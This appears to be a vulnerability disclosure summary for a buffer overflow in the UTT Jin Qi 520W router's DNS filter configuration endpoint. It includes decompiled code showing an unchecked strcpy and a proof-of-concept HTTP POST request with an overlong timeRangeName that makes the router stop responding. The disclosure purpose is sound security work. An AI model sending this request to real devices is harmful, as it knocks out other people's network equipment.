### Key Vulnerability Information Extracted from Screenshot #### 1. Product and Vendor Information - **Vendor**: UTT - **Product**: Jin Qi 520W Router #### 2. Affected Firmware Versions - **Version**: <= v3 v1.7.7-180627 #### 3. Vulnerability Overview - **Vulnerability Type**: Buffer Overflow - **Description**: By accessing the `/goform/formConfigDnsFilterGlobal` endpoint, an attacker can manipulate parameters to trigger a buffer overflow, leading to a Denial of Service (DoS) attack. #### 4. Vulnerability Details - **Critical Code**: When `sourceIP` is set to `ipRange`, the `timeRangeName` parameter is not properly validated, resulting in a buffer overflow. - **Code Example**: ```c // Critical code snippet src = (char *)websGetVar(a1, "DnsFilterEnable", ""); src_1 = (char *)websGetVar(a1, "timeRangeName", ""); // ... if ( strcmp(v6, "ipRange") || inet_aton(v4, &v11) && inet_aton(v5, &v12) ) { // ... if ( !strcmp(v6, "ipRange") ) { // ... strcpy((char *)(InstPointByIndex + 137), src_1); } } ``` #### 5. Proof of Concept (POC) - **Request Example**: ```http POST /goform/formConfigDnsFilterGlobal HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="80758026511f147977ce8ea9363e038c", uri: Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/* Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=2522114788 Connection: close sourceIP=ipRange&timeRangeName=aaaa... (repeated 'a' characters) ``` #### 6. Response Error Information - **Response Result**: A large number of repeated 'a' characters causes the HTTP request to time out. ```markdown ### Key Summary - The `/goform/formConfigDnsFilterGlobal` interface on the UTT Jin Qi 520W router is vulnerable to a buffer overflow. By crafting a malicious request with specially constructed parameters, an attacker can trigger the vulnerability, causing the service to become unresponsive.